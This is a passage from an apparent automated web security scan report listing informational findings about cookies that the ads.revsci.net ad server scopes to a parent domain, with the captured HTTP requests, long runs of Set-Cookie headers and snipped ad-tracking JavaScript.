Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_p40C=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_SQhO=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_NETa=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_ymv_=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_yjA-=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_jxhu=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_vWHn=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_IhUn=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_VkyB=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_kT-f=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_6E4b=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_5ibF=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_QSMB=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_7GZu=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Ykjc=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_B74h=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_VVZs=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_ZxL8=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_p52T=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_LU5v=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_uqCf=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_9hMX=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_hufe=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_XwOO=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_DQmF=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_E_kE=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_t2Ci=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_ruoh=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_eGsw=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_cly0=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_38vw=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_TJin=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_iScD=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_3v-F=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_JQpk=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_l5FR=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Wu51=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_bmoM=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_HmBn=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_8At2=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_-43F=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_ZQ2V=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_X7VX=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_O93y=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_semT=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_qPtn=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_lHfg=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_tnTy=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_cCPz=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_uI4c=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_2KsA=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_reJm=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_tv4w=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_A8W5=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_oGKA=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_cy6Z=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_ZrA0=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_L8i2=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Sa36=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_FrsI=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_zESt=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Ym1n=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_pUuq=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_uwnv=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus__2mg=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_EZsx=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_ZZ0H=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_BNSC=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_tax2=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_xyGv=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_yfbI=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_sG0W=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_4VQP=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_ExVS=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_cgR7=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_wtrl=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_o9vY=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_xmhv=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_qM8j=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_waet=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_RBpd=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_mILT=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus__nAQ=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_VsZJ=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_xqRq=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_GHGt=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_DSfE=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_tlyw=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_8Xg2=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_J61O=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_hhbJ=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_pHL8=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_XsfT=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_eQFb=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_qJz5=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_E85s=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_5Ucm=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_v_f5=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_bDDn=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_rNcS=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_5TRc=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_l2Kn=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_p40C=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_SQhO=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_NETa=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_ymv_=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_yjA-=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_jxhu=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_vWHn=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_IhUn=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_VkyB=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_kT-f=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_6E4b=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_5ibF=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_QSMB=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_7GZu=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Ykjc=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_B74h=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_VVZs=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_ZxL8=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_p52T=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_LU5v=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_uqCf=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_9hMX=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_hufe=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_XwOO=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_DQmF=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_E_kE=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_t2Ci=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_ruoh=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_eGsw=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_cly0=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_38vw=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_TJin=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_iScD=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_3v-F=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_JQpk=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_sZLs="MLtXrl8utl9nIAH3UpzIJlAWnrFYGbJvOWDi153GQb2cZxqKMlwiAWoJ5Yu9t3o3RMAlOi1iudA1qvDChUqCLpGZorRdTiZLCmu4FMR9FpglQcv0Y1wqRDvlSp+dnJtWb4pctVLY2kxSXEJ6h1S7KFlnlFhQJIHSkSQTXVd1wA8DYdU/cG7AYCLy9/dLqfyLTnaeh3NmViaoJIybWwWmlkBFss+7oIy0C5/dZoP1eijxhsUGplHBN8ZOLDaEyRA+gCdTCOCL7EINN3DAxLHHSdt5dg/i/I7/F0rRXTyOJHnaBHf4RLX0Ihr8i1qNqEYac/8uPOw="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Content-Type: application/x-javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 00:51:22 GMT
Content-Length: 940

function rsi_img(p,u,c){if(u.indexOf(location.protocol)==0){var i=new Image(2,3);if(c){i.onload=c;}
i.src=u;p[p.length]=i;}}
function rsi_simg(p,s,i){if(i<s.length){rsi_img(p,s[i],function(){rsi_sim
...[SNIP]...

11.8. http://ads.revsci.net/adserver/ako

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?activate&csid=J06575 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/topics
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_SQhO=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_p40C=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_NETa=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_ymv_=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_SQhO=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_p40C=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_NETa=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_ymv_=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_yjA-="MLtXrl8utl9nIAH3UpyYS5hfBI/9QmnaLO8+oQBTcj1w7zk1SBcuEp11OYV3eoEYGjpFZWOPgoNQci70eKD5Ye/TluCH1ph2OfNJJMjXr2tEwK6lT90zRjTWFir3Smdxu7Pzv7IGaJb71qrC4tVI3Snv040D4KfKVeDwv36XXJk56KbIZB9bXWfOPmlpFy/NYxQNhmbXX7VX4OufOCJaGnRnjt7od3EgCE3JFz3vU3k7mw43bPeHKuGhKee7f4PwRlAXPU22nFtYN+Qzfjq1jqlV4IJnvHjWiSaeoFFH8sW+jqA85vTE9ESWiYb8WI1yKhshWQ=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="pUMdJUmnOAIY1E3idJy9v6s4JGVJ5ObQ+5teuL11ZXhNSsXZ156dYZ/zFzx7/QK2StGwrzmf3c8cmJlrbiousVEvoToDEFJ1YaJsDm6tTMw+CAf64AC6eY9EN7eZdhTC+Ck513ESp294zWo7X0k04/Z7TVzJyAZ/W3jznJIUEqdU1MvgEn3LxKvvcjO0hJ7zokiDJZC1kr7s8qFNMcCFyZMPGAQ21/szK332YYSpqr4wbbKgSf1iqx1DkHEuFxdbdIDuOLV/7HDr0NSI9lfUz1DeVzP0JmoTPtwzgb8RnYjUpP9j7MJuO/1BHimcP7e6eWWC22CTIo5O5ghe229XFc53R3p/6IVPDoJ0f2o2u6pe4sqNRk8f+ktcpgyfjzEvgM+MPva8Ei9Xo9xSqcZpt0yu9Z/iFCoapf4P2ym1XfY/7kJ6+WWK/OTKSYX5lvT0qD1gmoFUuVLwYl2vhq4jUI9wfESh7XeADVSQEPzaVQMVoBmPTFYHzyc6qCrbDTXvN37EmmLnSUn8n8LX6/nkfMoPz08xYhN15l7cEJAO7eWxfAqYCK5bypxxpTHvd+4cQYCnS8hpP9EFHp7nkU4TLIA7QK/PlvTtIyPuP9fr+OoLZRcVteNeKwbfnhmTiCo7n4X2JZMQxdDny4vMVaWpaHblOeXc8jUsd1A0fax/8Cjpuqt+xYazn2DsB1aqMrYPglKJmcXXOzMrNMqOAD6AkPkBINEu3pbtyG0TWrs76ByH904QwXmVXuhHtLigqnqLxpAOGpU61RvW300ARPPLydRznVLLo3zM6+jS3AbPjds3pX2bLumlDwKTASho04dsVjnTmgsFlZH91XIdGf4XMWshXYvVc4vm04tg0PjkA6w/91baJncnmZLxWvccwNe1Re1P4QUSf9U="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Content-Type: application/x-javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 00:50:25 GMT
Content-Length: 541

function rsi_img(p,u,c){if(u.indexOf(location.protocol)==0){var i=new Image(2,3);if(c){i.onload=c;}
i.src=u;p[p.length]=i;}}
function rsi_simg(p,s,i){if(i<s.length){rsi_img(p,s[i],function(){rsi_sim
...[SNIP]...

11.9. http://ads.revsci.net/adserver/ako

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?activate&csid=I07714 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsiPus_kaha=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_ar9b=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Iei_=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_h03W=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_NETa=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_SQhO=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_p40C=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_ymv_=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_yjA-=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_jxhu=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_vWHn=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_IhUn=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_VkyB=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_kT-f=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_6E4b=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_5ibF=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_QSMB=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_7GZu=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Ykjc=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_B74h=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_VVZs=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_ZxL8=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_p52T=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_LU5v=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
